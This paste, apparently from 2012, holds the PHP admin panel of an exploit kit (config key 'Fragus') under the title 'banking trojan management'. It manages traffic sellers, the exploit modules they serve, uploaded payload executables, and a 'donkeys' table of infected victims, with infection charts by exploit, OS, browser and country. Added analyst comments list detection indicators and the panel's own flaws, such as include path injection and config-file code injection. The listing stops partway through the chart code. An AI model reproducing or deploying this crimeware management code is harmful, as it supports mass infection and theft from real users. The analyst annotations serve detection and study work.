RickeyGevers

Source code banking trojan management

Aug 21st, 2012
<?php

// Analyst annotation: this listing is the single-file admin front end of a web
// panel. Names visible in this file that are useful for triage and detection:
//   - config key $config['FragusVersion'] (written back in the preferences branch)
//   - tables `donkeys`, `sellers`, `files`
//   - paths ./secure/config.php, ./secure/templates/<language>/admin_*.php,
//     ./secure/exploits, ./secure/files/
//   - request parameters c=, get_ajax=1, img=, seller_id=, clear_db=1
//
// Request-scoped flag arrays. Later code sets keys such as
// $_Errors['FailsLogin'] and $_Messages['SellerAdded']; presumably the included
// templates read them (templates are not part of this listing).
$_Errors = array();
$_Messages = array();
// Bootstrap: pull in the configuration file and start the PHP session.
// $config is read throughout this file and is not assigned before this point,
// so it is expected to come from this include. The same file is rewritten by
// the "preferences" branch further down.
include("./secure/config.php");
session_start();
// Template language selection. This runs BEFORE the authentication gate, so an
// unauthenticated request can set $_SESSION['language'].
if (!isset($_SESSION['language'])){
    // First visit: fall back to the configured default language.
    $_SESSION['language'] = $config['AdminDefaultLanguage'];
}
if (isset($_POST['language'])){
    // The value is later concatenated into include() paths
    // ("./secure/templates/<language>/admin_*.php"). The only filtering is a
    // deny-list that removes ".", "/" and "\".
    // NOTE(review): a deny-list on a value that reaches include() is fragile;
    // the robust form is an allow-list check against the template directory
    // listing.
    $_SESSION['language'] = str_replace("\\", "", str_replace("/", "", str_replace(".", "", $_POST['language'])));
}
// Login handler: one shared account taken from the config file.
// Review observations (all visible in this block):
//   - the password is checked as an unsalted MD5 digest;
//   - both comparisons use loose "==" rather than "===" / hash_equals();
//   - there is no attempt counter, delay or lockout;
//   - the session id is not regenerated after a successful login.
if (isset($_POST['auth'])){
    if ((isset($_POST['login']) AND $_POST['login'] == $config['AdminLogin']) AND (isset($_POST['password']) AND md5($_POST['password']) == $config['AdminPassword'])){
        // Success: mark the session as authenticated and redirect to self
        // (POST/redirect/GET). PHP_SELF is derived from the request path.
        $_SESSION['auth'] = TRUE;
        header("Location: " . $_SERVER['PHP_SELF']);
        exit();
    } else {
        // Failure is only flagged for the template; nothing is logged here.
        $_Errors['FailsLogin'] = TRUE;
    }
}
// Authentication gate: without $_SESSION['auth'] the login template is rendered
// and the script stops, so everything below this block is reachable only with
// an authenticated session.
if (empty($_SESSION['auth'])){
    // Build the <option> list for the language selector on the login form.
    $langoptions = "";
    // NOTE(review): $langdir is a plain string here, not a directory listing
    // (the preferences branch uses scandir("./secure/templates") for the same
    // purpose), so the loop below does not walk the template directory.
    $langdir = ("./secure/templates");
    for ($i = 0; $i < count($langdir); $i++){
        // Skip "." / ".." and any entry whose name ends in ".php".
        if ($langdir[$i] != "." AND $langdir[$i] != ".." AND substr(strtolower($langdir[$i]), -4) != ".php"){
            if (isset($_POST['language']) AND $_POST['language'] == $langdir[$i]){
                $langoptions .= "<option value='" . $langdir[$i] . "' selected>" . ucfirst($langdir[$i]) . "</option>";
            } elseif (!isset($_POST['language']) AND $config['AdminDefaultLanguage'] == $langdir[$i]){
                $langoptions .= "<option value='" . $langdir[$i] . "' selected>" . ucfirst($langdir[$i]) . "</option>";
            } else {
                $langoptions .= "<option value='" . $langdir[$i] . "'>" . ucfirst($langdir[$i]) . "</option>";
            }
        }
    }
    // The include path is built from the session language, which an
    // unauthenticated POST can set (see the language selection block above).
    include("./secure/templates/" . $_SESSION['language'] . "/admin_login.php");
    exit();
}
// Database connection through the legacy ext/mysql API (mysql_* functions,
// removed in PHP 7.0), which dates the code base. Credentials come from
// $config. On failure the script terminates with a fixed plain-text message.
mysql_connect($config['MysqlHost'], $config['MysqlUser'], $config['MysqlPassword']) or die("Could not connect to mysql server.");
mysql_select_db($config['MysqlDbname']) or die("Could not select database.");
// Global counters over the `donkeys` table:
//   `all`   = number of rows,
//   `frags` = number of rows whose `status` is anything other than 'NOT'.
$globalstat = mysql_fetch_array(mysql_query("SELECT SUM(1) AS `all`, SUM(`status` <> 'NOT') AS `frags` FROM `donkeys`"));
if (strlen($globalstat['all']) < 1){
    // SUM() yields NULL on an empty table; normalise both counters to 0.
    $globalstat['all'] = 0;
    $globalstat['frags'] = 0;
}
// Polling endpoint: ?get_ajax=1 answers with the bare text "<all>|<frags>" and
// nothing else. It sits after the authentication gate, so it needs a session.
if (isset($_GET['get_ajax']) AND $_GET['get_ajax'] == "1"){
    echo $globalstat['all'] . "|" . $globalstat['frags'];
    exit();
}
// ---------------------------------------------------------------------------
// Authenticated request dispatcher, keyed on the "c" query parameter:
//   logout | trafficlinks | sellers | files | preferences | (default) statistics
//
// Review observations that apply to the whole chain:
//   - no anti-CSRF token is checked anywhere in this listing, and several
//     state-changing actions are driven by GET parameters alone
//     (delete_id, clear_id, clear_db);
//   - database values are concatenated into HTML without htmlspecialchars();
//   - `status` values seen in the queries: 'NOT', 'LOAD', 'BACKCONNECT'.
// ---------------------------------------------------------------------------
if (isset($_GET['c']) AND $_GET['c'] == "logout"){
    // Logout: drop the session and redirect to self.
    session_destroy();
    header("Location: " . $_SERVER['PHP_SELF']);
    exit();


// c=trafficlinks: per-seller link page.
} elseif (isset($_GET['c']) AND $_GET['c'] == "trafficlinks"){
    include("./secure/javascript.php");
    $sellerhash = "";
    $selleroptions = "";
    $result = mysql_query("SELECT `id`, `name`, `hash` FROM `sellers` ORDER BY `id` ASC");
    while ($row = mysql_fetch_array($result)){
        // `name` is emitted into HTML unescaped.
        $selleroptions .= "<option value='" . $row['id'] . "'" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] == $row['id']) ? " selected" : "") . ">" . $row['name'] . "</option>";
        if (isset($_GET['seller_id']) AND $_GET['seller_id'] != '0' AND $_GET['seller_id'] == $row['id']){
            // The selected seller is identified in links by "?s=<hash>".
            $sellerhash = "?s=" . $row['hash'];
        }
    }
    include("./secure/templates/" . $_SESSION['language'] . "/admin_trafficlinks.php");


// c=sellers: create, edit, clear and delete seller records.
} elseif (isset($_GET['c']) AND $_GET['c'] == "sellers"){

    // --- Edit an existing seller (edit_id) ---
    if (isset($_GET['edit_id']) AND intval($_GET['edit_id']) > 0){
        if (isset($_POST['action']) AND $_POST['action'] == "edit"){
            // Strings go through mysql_real_escape_string(), numbers through
            // intval(). The exploits[] POST array is stored as a PHP
            // serialize() string.
            mysql_query("UPDATE `sellers` SET `name` = '" . mysql_real_escape_string((strlen($_POST['name']) > 0) ? $_POST['name'] : "noname") . "', `file` = " . intval($_POST['file']) . ", `exploits` = '" . mysql_real_escape_string(serialize(isset($_POST['exploits']) ? $_POST['exploits'] : array())) . "' WHERE `id` = " . intval($_GET['edit_id']));
            header("Location: " . $_SERVER['PHP_SELF'] . "?c=sellers");
            exit();
        }
        // Load the record and pre-render the edit form fragments.
        if ($row = mysql_fetch_array(mysql_query("SELECT * FROM `sellers` WHERE `id` = " . intval($_GET['edit_id'])))){
            $seller['id'] = $row['id'];
            $seller['name'] = $row['name'];
            $seller['files'] = "";
            $result = mysql_query("SELECT `id`, `description` FROM `files`");
            while ($frow = mysql_fetch_array($result)){
                $seller['files'] .= "<option value='" . $frow['id'] . "'" . (($frow['id'] == $row['file']) ? " selected" : "") . ">" . $frow['description'] . "</option>";
            }
            $seller['exploits'] = "";
            // NOTE(review): unserialize() on a database column. The stored
            // value originates from the exploits[] POST array serialized above.
            $exp_default = unserialize($row['exploits']);
            // Module names come from the directory listing. The two explode()
            // calls imply file names shaped like "<prefix>-<label>.<ext>".
            $exploitsdir = scandir("./secure/exploits");
            for ($i = 0; $i < count($exploitsdir); $i++){
                if ($exploitsdir[$i] != "." AND $exploitsdir[$i] != ".."){
                    list($name) = explode(".", $exploitsdir[$i]);
                    list(,$tmpname) = explode("-", $name);
                    $seller['exploits'] .= "<tr><td><input type='checkbox' id='exp" . $i . "' name='exploits[]' value='" . $name . "'" . (in_array($name, $exp_default) ? " checked" : "") . "></td><td><label for='exp" . $i . "'>" . $tmpname . "</label></td></tr>";
                }
            }
        }
    }

    // --- Delete a seller and its `donkeys` rows (state change via GET) ---
    if (isset($_GET['delete_id']) AND intval($_GET['delete_id']) > 0){
        mysql_query("DELETE FROM `donkeys` WHERE `seller` = " . intval($_GET['delete_id']) . "");
        mysql_query("DELETE FROM `sellers` WHERE `id` = " . intval($_GET['delete_id']) . "");
        header("Location: " . $_SERVER['PHP_SELF'] . "?c=sellers");
        exit();
    }

    // --- Clear a seller's `donkeys` rows only (state change via GET) ---
    if (isset($_GET['clear_id']) AND intval($_GET['clear_id']) > 0){
        mysql_query("DELETE FROM `donkeys` WHERE `seller` = " . intval($_GET['clear_id']) . "");
        header("Location: " . $_SERVER['PHP_SELF'] . "?c=sellers");
        exit();
    }

    // --- Add a seller ---
    if (isset($_POST['action']) AND $_POST['action'] == "add"){
        // The seller hash is the first 10 hex characters of
        // md5(rand() . time()); neither input is a cryptographic random source.
        mysql_query("INSERT INTO `sellers` (`name`, `hash`, `file`, `exploits`) VALUES ('" . mysql_real_escape_string((strlen($_POST['name']) > 0) ? $_POST['name'] : "noname") . "', '" . substr(md5(rand() . time()), 0, 10) . "', " . intval($_POST['file']) . ", '" . mysql_real_escape_string(serialize(isset($_POST['exploits']) ? $_POST['exploits'] : array())) . "')");
        $_Messages['SellerAdded'] = TRUE;
    }

    // --- <option> list of files for the "add" form ---
    $files = "";
    $result = mysql_query("SELECT `id`, `description` FROM `files`");
    while ($row = mysql_fetch_array($result)){
        $files .= "<option value='" . $row['id'] . "'>" . $row['description'] . "</option>";
    }

    // --- Checkbox list of modules, pre-checked from the configured defaults ---
    $exploits = "";
    $exp_default = unserialize($config['Exploits']);
    $exploitsdir = scandir("./secure/exploits");
    for ($i = 0; $i < count($exploitsdir); $i++){
        if ($exploitsdir[$i] != "." AND $exploitsdir[$i] != ".."){
            list($name) = explode(".", $exploitsdir[$i]);
            list(,$tmpname) = explode("-", $name);
            // "@" hides the warning in_array() raises when $exp_default is not
            // an array.
            $exploits .= "<tr><td><input type='checkbox' id='exp" . $i . "' name='exploits[]' value='" . $name . "'" . (@in_array($name, $exp_default) ? " checked" : "") . "></td><td><label for='exp" . $i . "'>" . $tmpname . "</label></td></tr>";
        }
    }

    // --- Seller overview table ---
    // `hosts` = `donkeys` rows per seller; `frags` = rows of that seller with
    // status 'LOAD' or 'BACKCONNECT'.
    $sellers = array();
    $i = 0;
    $result = mysql_query("SELECT `sellers`.`id` AS `id`, `sellers`.`name` AS `name`, `sellers`.`hash` AS `hash`, `files`.`description` AS `file`, `sellers`.`exploits` AS `exploits`, (SELECT SUM(1) FROM `donkeys` WHERE `donkeys`.`seller` = `sellers`.`id`) AS `hosts`, (SELECT SUM(`donkeys`.`status` = 'LOAD' OR `donkeys`.`status` = 'BACKCONNECT') FROM `donkeys` WHERE `donkeys`.`seller` = `sellers`.`id`) AS `frags` FROM `sellers` LEFT JOIN `files` ON `files`.`id` = `sellers`.`file` ORDER BY `sellers`.`id` ASC");
    while ($row = mysql_fetch_array($result)){
        $sellers[$i]['id'] = $row['id'];
        $sellers[$i]['name'] = $row['name'];
        $sellers[$i]['hash'] = $row['hash'];
        $sellers[$i]['file'] = $row['file'];
        $sellers[$i]['exploits'] = unserialize($row['exploits']);
        // Replace each stored module name by the part after the first "-".
        for ($z = 0; $z < count($sellers[$i]['exploits']); $z++){
            list(,$tmpname) = explode("-", $sellers[$i]['exploits'][$z]);
            $sellers[$i]['exploits'][$z] = $tmpname;
        }
        // "* 1" coerces the (possibly NULL) SUM() result to a number.
        $sellers[$i]['hosts'] = $row['hosts'] * 1;
        $sellers[$i]['frags'] = $row['frags'] * 1;
        $i++;
    }
    include("./secure/templates/" . $_SESSION['language'] . "/admin_sellers.php");



// c=files: manage the uploaded files referenced by sellers.
} elseif (isset($_GET['c']) AND $_GET['c'] == "files"){

    // --- Edit file metadata and optionally replace the stored file ---
    if (isset($_GET['edit_id']) AND intval($_GET['edit_id']) > 0){
        if (isset($_POST['action']) AND $_POST['action'] == "edit"){
            mysql_query("UPDATE `files` SET `name` = '" . mysql_real_escape_string((strlen($_POST['name']) > 0) ? $_POST['name'] : "noname.exe") . "', `description` = '" . mysql_real_escape_string((strlen($_POST['description']) > 0) ? $_POST['description'] : "nodescription") . "' WHERE `id` = " . intval($_GET['edit_id']));
            if ($_FILES['filedata']['error'] == "0"){
                // The upload is stored under its numeric row id, with no
                // extension; no size or content check is performed here.
                move_uploaded_file($_FILES['filedata']['tmp_name'], "./secure/files/" . intval($_GET['edit_id']));
            }
            header("Location: " . $_SERVER['PHP_SELF'] . "?c=files");
            exit();
        }
        if ($row = mysql_fetch_array(mysql_query("SELECT * FROM `files` WHERE `id` = " . intval($_GET['edit_id'])))){
            $file['id'] = $row['id'];
            $file['name'] = $row['name'];
            $file['description'] = $row['description'];
        }
    }

    // --- Add a file: row first, then the upload saved as ./secure/files/<id> ---
    if (isset($_POST['action']) AND $_POST['action'] == "add"){
        if ($_FILES['filedata']['error'] == "0"){
            mysql_query("INSERT INTO `files` (`name`, `description`) VALUES ('" . mysql_real_escape_string((strlen($_POST['name']) > 0) ? $_POST['name'] : "noname.exe") . "', '" . mysql_real_escape_string((strlen($_POST['description']) > 0) ? $_POST['description'] : "nodescription") . "')");
            move_uploaded_file($_FILES['filedata']['tmp_name'], "./secure/files/" . mysql_insert_id());
            $_Messages['FileAdded'] = TRUE;
        } else {
            $_Messages['FileNoAdded'] = TRUE;
        }
    }

    // --- Delete a file (state change via GET) ---
    if (isset($_GET['delete_id']) AND intval($_GET['delete_id']) > 0){
        mysql_query("DELETE FROM `files` WHERE `id` = " . intval($_GET['delete_id']) . "");
        // Sellers that pointed at this file are reset to file id 0.
        mysql_query("UPDATE `sellers` SET `file` = 0 WHERE `file` = " . intval($_GET['delete_id']));
        @unlink("./secure/files/" . intval($_GET['delete_id']));
        header("Location: " . $_SERVER['PHP_SELF'] . "?c=files");
        exit();
    }

    // --- File overview with per-file counters from `donkeys` ---
    $files = array();
    $i = 0;
    $result = mysql_query("SELECT `files`.`id` AS `id`, `files`.`name` AS `name`, `files`.`description` AS `description`, (SELECT SUM(`donkeys`.`status` = 'LOAD' OR `donkeys`.`status` = 'BACKCONNECT') FROM `donkeys` WHERE `donkeys`.`file` = `files`.`id`) AS `frags`, (SELECT SUM(`donkeys`.`status` = 'BACKCONNECT') FROM `donkeys` WHERE `donkeys`.`file` = `files`.`id`) AS `backconnects` FROM `files` ORDER BY `files`.`id` ASC");
    while ($row = mysql_fetch_array($result)){
        $files[$i]['id'] = $row['id'];
        $files[$i]['name'] = $row['name'];
        $files[$i]['description'] = $row['description'];
        $files[$i]['backconnects'] = $row['backconnects'] * 1;
        $files[$i]['frags'] = $row['frags'] * 1;
        $i++;
    }
    include("./secure/templates/" . $_SESSION['language'] . "/admin_files.php");


// c=preferences: edit the panel configuration.
} elseif (isset($_GET['c']) AND $_GET['c'] == "preferences"){

    // --- Save: regenerate ./secure/config.php as PHP source ---
    // NOTE(review): request values are written into a file that is later
    // include()d. The only encoding is addslashes()/intval(), the values land
    // inside double-quoted PHP literals, and the serialized 'Exploits' value
    // goes into a single-quoted literal with no escaping at all. String-built
    // source is a code-injection-prone pattern; configuration belongs in a data
    // format or should be emitted with var_export(). The return value of
    // file_put_contents() is not checked. A new admin password is stored as an
    // unsalted MD5 digest.
    if (isset($_POST['action']) AND $_POST['action'] == "save"){
        file_put_contents("./secure/config.php", "<?php
 
\$config['FragusVersion'] = \"" . $config['FragusVersion'] . "\";
\$config['CryptSignature'] = \"" . $config['CryptSignature'] . "\";
 
\$config['MysqlHost'] = \"" . $config['MysqlHost'] . "\";
\$config['MysqlUser'] = \"" . $config['MysqlUser'] . "\";
\$config['MysqlPassword'] = \"" . $config['MysqlPassword'] . "\";
\$config['MysqlDbname'] = \"" . $config['MysqlDbname'] . "\";
 
\$config['AdminLogin'] = \"" . addslashes(trim($_POST['conf_login'])) . "\";
\$config['AdminPassword'] = \"" . ((strlen(trim($_POST['conf_pass'])) > 0) ? md5($_POST['conf_pass']) : $config['AdminPassword']) . "\";
\$config['AdminDefaultLanguage'] = \"" . addslashes(trim($_POST['conf_language'])) . "\";
\$config['AdminAjaxSeconds'] = " . intval($_POST['conf_ajaxseconds']) . ";
\$config['UrlToFolder'] = \"" . addslashes(trim($_POST['conf_url'])) . "\";
\$config['FinishRedirect'] = \"" . addslashes(trim($_POST['conf_finishurl'])) . "\";
\$config['DoubleIpRedirect'] = \"" . addslashes(trim($_POST['conf_doubleurl'])) . "\";
\$config['AjaxCheckBeforeExploit'] = " . (($_POST['conf_ajaxcheck'] == 1) ? 'TRUE' : 'FALSE') . ";
\$config['DefaultFile'] = \"" . intval($_POST['conf_defaultfile']) . "\";
\$config['Exploits'] = '" . serialize(isset($_POST['exploits']) ? $_POST['exploits'] : array()) . "';
 
?>");
        // Mirror the new values into the in-memory $config so the form below
        // shows them without re-including the file.
        $config['AdminLogin'] = trim($_POST['conf_login']);
        $config['AdminDefaultLanguage'] = trim($_POST['conf_language']);
        $config['AdminAjaxSeconds'] = intval($_POST['conf_ajaxseconds']);
        $config['UrlToFolder'] = trim($_POST['conf_url']);
        $config['FinishRedirect'] = trim($_POST['conf_finishurl']);
        $config['DoubleIpRedirect'] = trim($_POST['conf_doubleurl']);
        $config['AjaxCheckBeforeExploit'] = ($_POST['conf_ajaxcheck'] == 1) ? TRUE : FALSE;
        $config['DefaultFile'] = intval($_POST['conf_defaultfile']);
        $config['Exploits'] =serialize(isset($_POST['exploits']) ? $_POST['exploits'] : array());
    }


    // --- Language selector: one <option> per non-".php" entry in the template dir ---
    $langoptions = "";
    $langdir = scandir("./secure/templates");
    for ($i = 0; $i < count($langdir); $i++){
        if ($langdir[$i] != "." AND $langdir[$i] != ".." AND substr(strtolower($langdir[$i]), -4) != ".php"){
            if ($config['AdminDefaultLanguage'] == $langdir[$i]){
                $langoptions .= "<option value='" . $langdir[$i] . "' selected>" . ucfirst($langdir[$i]) . "</option>";
            } else {
                $langoptions .= "<option value='" . $langdir[$i] . "'>" . ucfirst($langdir[$i]) . "</option>";
            }
        }
    }

    // --- Default-file selector ---
    // NOTE(review): this is an "if", not a "while", so only the first row of
    // `files` is turned into an <option> (the sellers branch loops over all rows).
    $fileslist = "";
    if ($row = mysql_fetch_array(mysql_query("SELECT `id`, `description` FROM `files`"))){
        $fileslist .= "<option value='" . $row['id'] . "'" . (($config['DefaultFile'] == $row['id']) ? ' selected' : ''). ">" . $row['description'] . "</option>";
    }

    // --- Default module checkboxes, two per table row ---
    $exploits = "";
    $exp_default = unserialize($config['Exploits']);
    $exploitsdir = scandir("./secure/exploits");
    for ($i = 0; $i < count($exploitsdir); $i++){
        if ($exploitsdir[$i] != "." AND $exploitsdir[$i] != ".."){
            list($name) = explode(".", $exploitsdir[$i]);
            list(,$tmpname) = explode("-", $name);
            // Start a new table row on every even directory index.
            ($i%2 == 0) ? ($exploits .= '</tr><tr>') : '';
            $exploits .= "<td width='50%'><table><tr><td><input type='checkbox' id='exp" . $i . "' name='exploits[]' value='" . $name . "'" . (@in_array($name, $exp_default) ? " checked" : "") . "></td><td><label for='exp" . $i . "'>" . $tmpname . "</label></td></tr></table></td>";
        }
    }

    include("./secure/templates/" . $_SESSION['language'] . "/admin_preferences.php");


// Default branch (no or unknown "c"): statistics view and chart image endpoints.
} else {

    // --- ?clear_db=1 empties the `donkeys` table (state change via GET) ---
    if (isset($_GET['clear_db']) AND $_GET['clear_db'] == "1"){
        mysql_query("TRUNCATE TABLE `donkeys`");
        header("Location: " . $_SERVER['PHP_SELF']);
        exit();
    }

    // --- GeoIP helper; its GEOIP_COUNTRY_CODES table maps the stored numeric
    //     country value to a code in the country chart below ---
    include("./secure/geoip.php");
    $gi = new GeoIP;

    // --- ?img=exploits: PNG bar chart, top 6 values of `exploit` ---
    // All four chart endpoints follow the same shape: query, fill a pData set,
    // draw with pChart, render to a fixed file name under ./secure/files/,
    // stream it, delete it. NOTE(review): the fixed temp path is shared by
    // concurrent requests.
    if (isset($_GET['img']) AND $_GET['img'] == "exploits"){
        include("./secure/pchart.php");
        // Map "<id>-<label>.<ext>" file names in ./secure/exploits to id => label.
        $explarray = array();
        $exploitsdir = scandir("./secure/exploits");
        for ($i = 0; $i < count($exploitsdir); $i++){
            if ($exploitsdir[$i] != "." AND $exploitsdir[$i] != ".."){
                list($name) = explode(".", $exploitsdir[$i]);
                list($id, $namee) = explode("-", $name);
                $explarray[$id] = $namee;
            }
        }
        // seller_id is forced through intval() before it reaches the SQL text.
        $result = mysql_query("SELECT `exploit`, SUM(1) AS `all`, SUM(`status` = 'BACKCONNECT') AS `loaded` FROM `donkeys` WHERE `status` <> 'NOT'" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " AND `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `exploit` ORDER BY `loaded` DESC, `all` DESC LIMIT 6");
        $browsers = array();
        $sum_all = array();
        $sum_frags = array();
        while ($row = mysql_fetch_array($result)){
            $sum_all[] = $row['all'];
            $sum_frags[] = $row['loaded'];
            // Id 0 is labelled "OTHER"; other ids are looked up in the map above.
            $browsers[] = ($row['exploit'] == 0) ? "OTHER" : $explarray[$row['exploit']];
        }

        $DataSet = new pData;
        if (count($browsers) > 0){
            $DataSet->AddPoint($sum_all,"Serie1");
            $DataSet->AddPoint($sum_frags,"Serie2");
            $DataSet->AddPoint($browsers,"Serie3");
        } else {
            // Placeholder series so the chart still renders on an empty table.
            $DataSet->AddPoint(array(0),"Serie1");
            $DataSet->AddPoint(array(0),"Serie2");
            $DataSet->AddPoint(array("Data is empty"),"Serie3");
        }
        $DataSet->AddAllSeries();
        $DataSet->SetAbsciseLabelSerie();
        $DataSet->SetSerieName("Frags","Serie1");
        $DataSet->SetSerieName("Feedback","Serie2");
        $DataSet->SetAbsciseLabelSerie("Serie3");
        $Test = new pChart(480,180);
        $Test->setFontProperties("./secure/tahoma.ttf",8);
        $Test->setGraphArea(55,20,385,150);
        $Test->drawFilledRoundedRectangle(7,7,473,173,5,240,240,240);
        $Test->drawRoundedRectangle(5,5,475,175,5,230,230,230);
        $Test->drawGraphArea(255,255,255,TRUE);
        $Test->drawScale($DataSet->GetData(),$DataSet->GetDataDescription(),SCALE_START0,150,150,150,TRUE,0,2,TRUE);
        $Test->drawGrid(4,TRUE,230,230,230,50);
        $DataSet->RemoveSerie("Serie3");
        $Test->setFontProperties("./secure/tahoma.ttf",6);
        $Test->drawTreshold(0,143,55,72,TRUE,TRUE);
        $Test->drawOverlayBarGraph($DataSet->GetData(),$DataSet->GetDataDescription());
        $Test->setFontProperties("./secure/tahoma.ttf",8);
        $Test->drawLegend(395,20,$DataSet->GetDataDescription(),255,255,255);
        $Test->Render("./secure/files/exploits.png");
        header("Content-type: image/png");
        echo file_get_contents("./secure/files/exploits.png");
        unlink("./secure/files/exploits.png");
        exit();
    }

    // --- ?img=os: PNG bar chart, top 8 values of `os` ---
    if (isset($_GET['img']) AND $_GET['img'] == "os"){
        include("./secure/pchart.php");
        $result = mysql_query("SELECT `os`, SUM(1) AS `all`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `loaded` FROM `donkeys`" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " WHERE `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `os` ORDER BY `loaded` DESC, `all` DESC LIMIT 8");
        $browsers = array();
        $sum_all = array();
        $sum_frags = array();
        while ($row = mysql_fetch_array($result)){
            $sum_all[] = $row['all'];
            $sum_frags[] = $row['loaded'];
            // Purely numeric OS labels get a chr(160) prefix; presumably so the
            // chart library treats them as text rather than numbers (TODO confirm).
            if ($row['os'] == "95" OR $row['os'] == "98" OR $row['os'] == "2000" OR $row['os'] == "2003"){
                $browsers[] = chr(160) . $row['os'];
            } else {
                $browsers[] = $row['os'];
            }
        }
        $DataSet = new pData;
        if (count($browsers) > 0){
            $DataSet->AddPoint($sum_all,"Serie1");
            $DataSet->AddPoint($sum_frags,"Serie2");
            $DataSet->AddPoint($browsers,"Serie3");
        } else {
            $DataSet->AddPoint(array(0),"Serie1");
            $DataSet->AddPoint(array(0),"Serie2");
            $DataSet->AddPoint(array("Data is empty"),"Serie3");
        }
        $DataSet->AddAllSeries();
        $DataSet->SetAbsciseLabelSerie();
        $DataSet->SetSerieName("All","Serie1");
        $DataSet->SetSerieName("Frags","Serie2");
        $DataSet->SetAbsciseLabelSerie("Serie3");
        $Test = new pChart(480,180);
        $Test->setFontProperties("./secure/tahoma.ttf",8);
        $Test->setGraphArea(55,20,385,150);
        $Test->drawFilledRoundedRectangle(7,7,473,173,5,240,240,240);
        $Test->drawRoundedRectangle(5,5,475,175,5,230,230,230);
        $Test->drawGraphArea(255,255,255,TRUE);
        $Test->drawScale($DataSet->GetData(),$DataSet->GetDataDescription(),SCALE_START0,150,150,150,TRUE,0,2,TRUE);
        $Test->drawGrid(4,TRUE,230,230,230,50);
        $DataSet->RemoveSerie("Serie3");
        $Test->setFontProperties("./secure/tahoma.ttf",6);
        $Test->drawTreshold(0,143,55,72,TRUE,TRUE);
        $Test->drawOverlayBarGraph($DataSet->GetData(),$DataSet->GetDataDescription());
        $Test->setFontProperties("./secure/tahoma.ttf",8);
        $Test->drawLegend(400,20,$DataSet->GetDataDescription(),255,255,255);
        $Test->Render("./secure/files/os.png");
        header("Content-type: image/png");
        echo file_get_contents("./secure/files/os.png");
        unlink("./secure/files/os.png");
        exit();
    }

    // --- ?img=browsers: PNG bar chart over all values of `browser` ---
    if (isset($_GET['img']) AND $_GET['img'] == "browsers"){
        include("./secure/pchart.php");
        $result = mysql_query("SELECT `browser`, SUM(1) AS `all`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `loaded` FROM `donkeys`" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " WHERE `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `browser` ORDER BY `loaded` DESC, `all` DESC");
        $browsers = array();
        $sum_all = array();
        $sum_frags = array();
        while ($row = mysql_fetch_array($result)){
            $sum_all[] = $row['all'];
            $sum_frags[] = $row['loaded'];
            $browsers[] = $row['browser'];
        }
        $DataSet = new pData;
        if (count($browsers) > 0){
            $DataSet->AddPoint($sum_all,"Serie1");
            $DataSet->AddPoint($sum_frags,"Serie2");
            $DataSet->AddPoint($browsers,"Serie3");
        } else {
            $DataSet->AddPoint(array(0),"Serie1");
            $DataSet->AddPoint(array(0),"Serie2");
            $DataSet->AddPoint(array("Data is empty"),"Serie3");
        }
        $DataSet->AddAllSeries();
        $DataSet->SetAbsciseLabelSerie();
        $DataSet->SetSerieName("All","Serie1");
        $DataSet->SetSerieName("Frags","Serie2");
        $DataSet->SetAbsciseLabelSerie("Serie3");
        $Test = new pChart(480,180);
        $Test->setFontProperties("./secure/tahoma.ttf",8);
        $Test->setGraphArea(55,20,385,150);
        $Test->drawFilledRoundedRectangle(7,7,473,173,5,240,240,240);
        $Test->drawRoundedRectangle(5,5,475,175,5,230,230,230);
        $Test->drawGraphArea(255,255,255,TRUE);
        $Test->drawScale($DataSet->GetData(),$DataSet->GetDataDescription(),SCALE_START0,150,150,150,TRUE,0,2,TRUE);
        $Test->drawGrid(4,TRUE,230,230,230,50);
        $DataSet->RemoveSerie("Serie3");
        $Test->setFontProperties("./secure/tahoma.ttf",6);
        $Test->drawTreshold(0,143,55,72,TRUE,TRUE);
        $Test->drawOverlayBarGraph($DataSet->GetData(),$DataSet->GetDataDescription());
        $Test->setFontProperties("./secure/tahoma.ttf",8);
        $Test->drawLegend(400,20,$DataSet->GetDataDescription(),255,255,255);
        $Test->Render("./secure/files/browsers.png");
        header("Content-type: image/png");
        echo file_get_contents("./secure/files/browsers.png");
        unlink("./secure/files/browsers.png");
        exit();
    }

    // --- ?img=country: PNG bar chart, top 10 values of `country` ---
    if (isset($_GET['img']) AND $_GET['img'] == "country"){
        include("./secure/pchart.php");
        $result = mysql_query("SELECT `country`, SUM(1) AS `all`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `loaded` FROM `donkeys`" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " WHERE `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `country` ORDER BY `loaded` DESC, `all` DESC LIMIT 10");
        $countrys = array();
        $sum_all = array();
        $sum_frags = array();
        while ($row = mysql_fetch_array($result)){
            $sum_all[] = $row['all'];
            $sum_frags[] = $row['loaded'];
            // Country value 0 is shown as "??"; other values index the GeoIP
            // country-code table.
            $countrys[] = ($row['country'] == 0) ? "??" : $gi->GEOIP_COUNTRY_CODES[$row['country']];
        }
        $DataSet = new pData;
        if (count($countrys) > 0){
            $DataSet->AddPoint($sum_all,"Serie1");
            $DataSet->AddPoint($sum_frags,"Serie2");
            $DataSet->AddPoint($countrys,"Serie3");
        } else {
            $DataSet->AddPoint(array(0),"Serie1");
            $DataSet->AddPoint(array(0),"Serie2");
            $DataSet->AddPoint(array("Data is empty"),"Serie3");
        }
        $DataSet->AddAllSeries();
        $DataSet->SetAbsciseLabelSerie();
        $DataSet->SetSerieName("All","Serie1");
        $DataSet->SetSerieName("Frags","Serie2");
        $DataSet->SetAbsciseLabelSerie("Serie3");
        $Test = new pChart(480,180);
        $Test->setFontProperties("./secure/tahoma.ttf",8);
        $Test->setGraphArea(55,20,385,150);
        $Test->drawFilledRoundedRectangle(7,7,473,173,5,240,240,240);
        $Test->drawRoundedRectangle(5,5,475,175,5,230,230,230);
        $Test->drawGraphArea(255,255,255,TRUE);
        $Test->drawScale($DataSet->GetData(),$DataSet->GetDataDescription(),SCALE_START0,150,150,150,TRUE,0,2,TRUE);
        $Test->drawGrid(4,TRUE,230,230,230,50);
        $DataSet->RemoveSerie("Serie3");
